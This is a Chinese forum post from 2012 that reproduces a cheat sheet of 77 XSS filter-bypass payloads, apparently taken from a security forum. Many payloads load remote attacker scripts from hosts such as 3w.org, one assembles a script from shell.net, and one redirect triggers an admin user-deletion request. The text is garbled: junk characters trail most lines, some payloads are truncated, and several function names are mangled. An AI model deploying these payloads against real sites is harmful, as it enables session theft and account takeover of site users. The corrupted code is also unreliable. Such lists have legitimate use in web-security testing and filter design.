貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。9 b* J7 X" N2 S' N
1 j ]2 z w1 U4 S: _1 i
(1)普通的XSS JavaScript注入
% q7 t' ?' Y" u; R0 J/ K0 Q <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 c; M* r% O" T$ A. n
" y6 }8 \* i$ L/ a% ?( u (2)IMG标签XSS使用JavaScript命令5 Z# a, J! o. e5 ^9 @, ~& s4 R. x3 a; X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 G1 u y0 F1 k E2 [" O
# b [9 G* X. E* n' d (3)IMG标签无分号无引号* v4 |$ s, t! U2 Q- d0 P+ F
<IMG SRC=javascript:alert(‘XSS’)>- @8 h* w, H" _. O( o
4 ^2 [( h6 w4 Q. B
(4)IMG标签大小写不敏感 b- Y% N. I7 H% m6 G9 z3 O* h
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& A* ?; S% y7 K& L5 L) a& i
2 [ B* u% D8 G7 s) F
(5)HTML编码(必须有分号): s" _ T$ s7 o- @8 w& [; H, ?7 s
<IMG SRC=javascript:alert(“XSS”)>
\! P% v; H3 g1 D3 {' w4 ]
0 L! g, r! N6 t! L/ S r7 n (6)修正缺陷IMG标签
/ U+ b& R, U2 g! H$ } <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 @% B6 F! I6 i$ l5 _; r9 z
# F" n4 l( E: K! v% m5 I (7)formCharCode标签(计算器)
# W7 O8 k- y; J9 }/ J1 a9 l <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# d$ c8 ^- N* M
& r; M; c2 W) ]1 L) W (8)UTF-8的Unicode编码(计算器)
2 Z; T& f4 v9 C$ @0 @) s <IMG SRC=jav..省略..S')>9 p3 j% A2 s& T
9 t! A) m9 A& _4 p0 h7 z: k' Q" J7 h
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
+ L, i3 P5 b0 h. S <IMG SRC=jav..省略..S')>
; }# K# \# d) {' y3 y. M! `( H, [( o7 T1 P+ u
(10)十六进制编码也是没有分号(计算器)% h0 F2 V; a8 y9 K
<IMG SRC=java..省略..XSS')>8 X5 @& d1 g& F6 Z' k% E
1 v* |6 D, Q( m
(11)嵌入式标签,将Javascript分开
/ N- i8 V9 l5 Y8 a <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 }( @( b' B1 r" c' M8 _' s) L& x; h
(12)嵌入式编码标签,将Javascript分开
: V2 Y8 x. X3 B& K' @ u6 ~% R* J <IMG SRC=”jav ascript:alert(‘XSS’);”>
( j! C/ _: |' g! b+ h
. Q4 n& k9 q3 ]# P* j. C (13)嵌入式换行符 D( i8 V# m! y9 ~+ D# R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 S0 t w2 g% t/ y; z5 M% l0 K2 Y9 d
(14)嵌入式回车5 \; H8 ]4 z( t1 F% Q; r, k
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 F1 E5 U3 `3 K$ n3 |- W$ v. |
0 h- }# k/ ^ w* P& s5 w" b (15)嵌入式多行注入JavaScript,这是XSS极端的例子+ ~% U, j; Z! T: X, j' D
<IMG SRC=”javascript:alert(‘XSS‘)”>
% X( U* N0 A6 o9 Q3 l6 G( s% p, K, ^4 M% {
(16)解决限制字符(要求同页面)
2 z. W0 G4 O/ P% R/ P. g6 f& M <script>z=’document.’</script>
1 z4 L/ _9 d L% r+ { <script>z=z+’write(“‘</script>0 x+ v3 x1 l! K6 Z: L3 [# V" x8 C
<script>z=z+’<script’</script>8 z% J5 F% L2 o+ s
<script>z=z+’ src=ht’</script>
. K; ]1 p* Z/ {7 k <script>z=z+’tp://ww’</script>9 B! J1 ~- ~* i D4 J" d% u
<script>z=z+’w.shell’</script>8 h7 X7 }8 ~( A% ]6 E
<script>z=z+’.net/1.’</script>
4 ^- N* B/ f! v- G <script>z=z+’js></sc’</script>! T" D$ v$ b1 j$ S
<script>z=z+’ript>”)’</script>% V. C) h8 v: \: W- E8 k- D
<script>eval_r(z)</script>0 [' B7 T. q' I! [1 q: G
: _, l9 Q! r. C
(17)空字符9 T; _: r/ M3 ]' K; K
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, g/ L: Z: g& L2 V+ D- x. e. l
a" u9 ?& Z, z8 S& f: E$ x! d! U1 _ (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用2 ~5 x0 Q( x* o8 e2 b
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! `5 t3 H( `2 k6 Y( d5 O. J1 x! f9 `/ j, l
(19)Spaces和meta前的IMG标签
2 h0 ?' Z' Z1 o/ Q( [' a/ k <IMG SRC=” � javascript:alert(‘XSS’);”>
% R9 |4 h" Q h6 d U( X, n
4 Q$ z+ @& O. ~- e# o. V (20)Non-alpha-non-digit XSS
2 L: e# _" g5 X5 m9 v+ u; y- A5 h5 r <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& |; x$ U3 R% f* |5 r2 u9 I' g
( z0 R. L( B2 M: P; X) k (21)Non-alpha-non-digit XSS to 2
+ Q/ Q' `3 u6 e% B, o0 d( b# } <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
8 y9 ]" s: A& F: {( j! T& l* Z
" G* o1 ~: G, A6 r5 q+ ] (22)Non-alpha-non-digit XSS to 35 _ i4 A" d2 c( Y' I) g" Y1 U
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># _$ ~, e! ? O$ Y
3 b% @0 [9 y% L) ], N1 E& h( z. [
(23)双开括号 [3 Y7 o4 z$ d# N
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; ]7 `9 B% h( G% V& ^: D2 d. K& V6 S; z5 y: f; E
(24)无结束脚本标记(仅火狐等浏览器)
: j/ R0 ~! `! d* h6 e <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>, M1 A; t4 w6 @ u; O
# ~! f3 s4 w- n' C& z7 D (25)无结束脚本标记2
5 \5 _: \. d* ~8 [ <SCRIPT SRC=//3w.org/XSS/xss.js>
6 r# d6 ^/ S# q: @9 z! m# D# i. ?4 n/ S
(26)半开的HTML/JavaScript XSS% j! x- N" i' P0 z" }
<IMG SRC=”javascript:alert(‘XSS’)”/ b, a2 o `1 N2 x
4 \: ]- i% z- l) { (27)双开角括号
/ D# E1 w9 ^% B( K# Z$ @ K& \ <iframe src=http://3w.org/XSS.html <4 Z N+ {7 h( @- y: X, z
" r/ o. f: v9 O+ U0 O4 I" q0 N (28)无单引号 双引号 分号
. c" \5 y% _ j a2 [" D5 s <SCRIPT>a=/XSS/
7 [8 @- T! }% u& S alert(a.source)</SCRIPT>: e) M ~1 ~" \: t, y
, O: N6 O: f. ?# r" I. S$ u$ @$ C
(29)换码过滤的JavaScript
' B1 l( y& e5 w8 x$ u v0 X1 a6 ? \”;alert(‘XSS’);//) A: s/ J, f3 K5 y
8 W2 S9 g, E0 S# x0 a! n, m
(30)结束Title标签+ Q+ @! l! N3 {) ^
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>$ e5 K; {5 J* g s$ q! _
: H) z& ? X0 J$ D. ~& O
(31)Input Image4 m- Z# m- X' F* f9 A
<INPUT SRC=”javascript:alert(‘XSS’);”>' p4 {1 d3 u. c. P1 H! f1 s4 s
, m- c0 \; T6 n( r* g
(32)BODY Image6 V) u2 S5 U+ X4 }
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ u2 [" I2 T4 V3 y4 k7 M
7 G% M% [% S, o. n" ~. V4 N; | (33)BODY标签: c8 X2 C: P4 J; C, I% E
<BODY(‘XSS’)>
/ c7 I9 r: J$ Z
7 j0 N% n% s$ M9 f, H: n (34)IMG Dynsrc
8 w3 }+ ]; x+ }9 F) V) k' O <IMG DYNSRC=”javascript:alert(‘XSS’)”>) {! ?6 ]# o: _/ @6 u
% k6 t- `$ x& f. b, Q% o' c1 `
(35)IMG Lowsrc! i+ H1 K9 K) e& p, m
<IMG LOWSRC=”javascript:alert(‘XSS’)”>8 C. e* v" {1 \
# Z$ v2 u; s! v, H# A: ~ (36)BGSOUND4 Y! E5 p S$ A' c- |. ?- j: t
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
( M9 b& s' [3 g/ B9 P
a. W% M0 q- r8 L" n (37)STYLE sheet0 q$ O$ A! s0 P+ s7 v
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 R( M7 N3 v- ]& u3 }
; j( L# F8 J/ O) R5 \+ F) n* y (38)远程样式表- _" `" ?' Y/ z4 L0 u
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! w8 o9 u+ K: a
. J: o9 ~, n" {9 T' @ |$ \" |
(39)List-style-image(列表式)
' c1 f- Z* Q P9 V/ n( @ <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 l3 t$ T+ v C
9 r& D. l' O; h (40)IMG VBscript
3 R) D" Y7 v$ ` <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# X' R/ w; k; A2 g
* u9 x) Q2 T/ v) R (41)META链接url
. P2 {; u; S- |7 b% z <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
) M0 q* b0 f/ s, H* X/ U( h% [5 D9 u) h% j
(42)Iframe" `# \' O0 i& ?$ K
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: d; p0 j X$ l5 U9 d0 B% T1 a( T. l/ i2 J8 N5 E/ c/ O$ m
(43)Frame
6 ^, u% c2 }8 K$ A4 F <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET># J. q% L- u% v5 \" P# T
% K# u( |' h/ f6 C ^0 X (44)Table
/ k' T* d: q, H. Z% y <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 H8 f3 W7 T- h, L' m6 U3 V$ C# \& A f1 b! k
(45)TD8 n: |+ v+ t A) p9 S0 |
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># I- U" {/ E4 Y) N( L- J
. s+ r5 U' H2 ?5 T% {+ N% C" R2 s (46)DIV background-image. _, X6 f# X/ t. s0 ]6 P: b% U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ y+ F# ?6 E) Z2 \/ R) J. L5 H
# b% q$ x# |( }9 s4 h
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279): V8 L: D. l1 F) A( x/ L
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
; V3 [$ Z) l' j; }/ y5 J# F- p. c4 g. E/ u
(48)DIV expression
1 w Y: p4 l6 Q5 R2 e9 ]! o <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# Y2 ^ A) c( Y) Y' i) l/ P! ?7 }5 W" h& o6 P r8 }
(49)STYLE属性分拆表达
7 i. F1 ~2 S. `/ q. k4 D <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
* }: L) X) Q) Z. l5 |3 I# ~, O
$ t- \) T( Q: s2 j9 _: n4 H8 N (50)匿名STYLE(组成:开角号和一个字母开头)
, w$ Z$ J7 q* ?& u9 {1 j' @$ @ <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% l& K: S+ j' N" ]- V2 T) N" I
! x: l+ C# N, i& R6 _5 A
(51)STYLE background-image
2 N9 @5 z& [- M2 p: i( y& V <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ X! b+ x% M0 ~; s* V# z
) ~0 R! n& e* r3 S8 }0 f (52)IMG STYLE方式) z% B3 Y8 J1 H5 Z6 O
exppression(alert(“XSS”))’>
2 t& g2 ~ A/ }% K: H3 w, | B) z& C! |) l2 d
(53)STYLE background
3 f4 g7 N; G: L5 E5 K9 c <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* }( c P0 _1 x$ P2 o( q
$ R( {) U* h9 T; A (54)BASE# C' _7 Q- Q2 J: ^' p! R9 [
<BASE HREF=”javascript:alert(‘XSS’);//”>
% t6 k" I; r- r6 O$ d/ x; m6 C0 b0 ]# ?( W5 H
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
5 @% N& R; R2 ^) S& _) \0 Q <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>9 x/ i: r3 W7 H/ f3 U c9 s c
; C/ {2 Y% `6 N2 D# F, a4 b: x
(56)在flash中使用ActionScrpt可以混进你XSS的代码
6 n Q6 o) r' R2 Y a=”get”;0 V: D Z) ~: c- }9 _# n
b=”URL(\”";. n! n' Q& G2 [8 V: k
c=”javascript:”;
1 |/ U; _) H2 Q2 u4 y c d=”alert(‘XSS’);\”)”;
9 i: V8 N$ ?0 u& d7 A$ W4 v eval_r(a+b+c+d);
" ?9 l* ]1 J% e$ [3 |0 i" r) i- W# Y* d/ z# r1 G6 t
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上7 K7 ~. W- Y6 T/ ]+ _0 X$ G1 J
<HTML xmlns:xss>
7 a: }5 a8 r1 |/ t2 E+ V <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>0 o* y+ g0 _# P3 c
<xss:xss>XSS</xss:xss>0 N% V6 N! h8 s+ j6 O
</HTML>
$ @# E3 a, Z( p, _; V# i
' j8 o" p8 F6 T6 v2 ^ (58)如果过滤了你的JS你可以在图片里添加JS代码来利用& j1 B+ \2 s, ~1 x( ]1 D9 \
<SCRIPT SRC=””></SCRIPT>8 U7 e0 U3 K3 I1 c g2 r' X- x
7 G1 u. {% h( H/ q (59)IMG嵌入式命令,可执行任意命令* o2 L8 |( t3 l! j/ w
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
, N* a* R1 C& A% `2 R3 m8 o! U0 `: J
(60)IMG嵌入式命令(a.jpg在同服务器)
* y7 B) w4 @* k! h5 ~, ~ Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% M! P- c' a# @7 K' x/ A7 s1 K! p
& E" U# b4 g; ~) j) z. Z: \$ ? (61)绕符号过滤% O* p1 Q+ D; Y% k+ G
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 [5 `5 B- v9 L4 G1 U* f# S1 U$ j* V+ p
(62)
- D% g z' R6 p <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 Z- Q' p4 D- m. B4 e% s0 R( E( s" N& m% a
(63)
; A/ R' R7 k1 Y" B5 v5 K/ Z <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
( C( G0 G' `+ W3 @2 @, p1 W; T! C
* _/ K5 e( p' W% J I0 ~( `0 w* ^ f (64)
5 s8 i1 q3 ^0 D9 a: X$ g) Z <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>! {8 S3 k) Z8 y5 d# `/ D' ^( o
. ]" `5 D. C7 ~ (65)
, b1 A b: U$ Y, Z <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
9 r. o6 s: W B0 o0 R# K) D- `8 a2 H
(66)
, y5 a/ ^2 z) v <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT># w$ f8 G) j( T9 f; L
6 E7 b! n1 r% @- T (67)! [, U) j$ r9 L
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: q$ l$ w: ~9 ?& H! ` z3 m' V
: t& [( l! m7 E6 i G, a6 @' x6 { (68)URL绕行+ F2 y( E* P" f+ P# b
<A HREF=”http://127.0.0.1/”>XSS</A>
' Y1 _! Q' r1 t+ L: v
" s# N# E0 Q! X5 s, @! j (69)URL编码* {! b9 m% G/ c* M8 {; X
<A HREF=”http://3w.org”>XSS</A>
) w3 ?/ p) O" R- V4 Y
+ O3 M) p; i f (70)IP十进制! j+ w% r% B4 I% E) a) l8 t, ]
<A HREF=”http://3232235521″>XSS</A>
* D: L8 ?8 u. K1 H7 R+ [% O5 E3 g- {& l" V7 T- S
(71)IP十六进制: f- }0 k5 Z. X8 |. I8 O6 y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 ]7 g& q8 W+ b
. ]& b* o4 p% A) i (72)IP八进制7 G P% V6 C" _7 t B
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ U! U$ t' o( m ^# k
& S( r$ @) N \6 r, e (73)混合编码
* d; _3 r# ^9 a( } h <A HREF=”h
0 a. {: `0 f/ u1 Q6 I& i6 |" X4 Q- \ tt p://6 6.000146.0×7.147/”">XSS</A>
$ R# D/ i9 f) s' X, K8 v
5 S- D+ Z3 u& h: n3 a0 d (74)节省[http:]
) J! K8 E( h: E4 S8 w3 Y <A HREF=”//www.google.com/”>XSS</A>2 ` Z0 }1 Y$ Q4 |% y
- y! {# E1 K1 L (75)节省[www]
& \" i3 O8 R# c* f# } <A HREF=”http://google.com/”>XSS</A>
- S1 {. X$ ?3 Z$ ]& p, B9 Y- d& G
(76)绝对点绝对DNS0 T; q z4 R3 n6 {2 d! v, r- m
<A HREF=”http://www.google.com./”>XSS</A>: Y9 }2 s- [2 W C/ B/ D
7 f% B/ ?/ b6 y! f: C (77)javascript链接* [! T$ f6 f+ }5 c
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对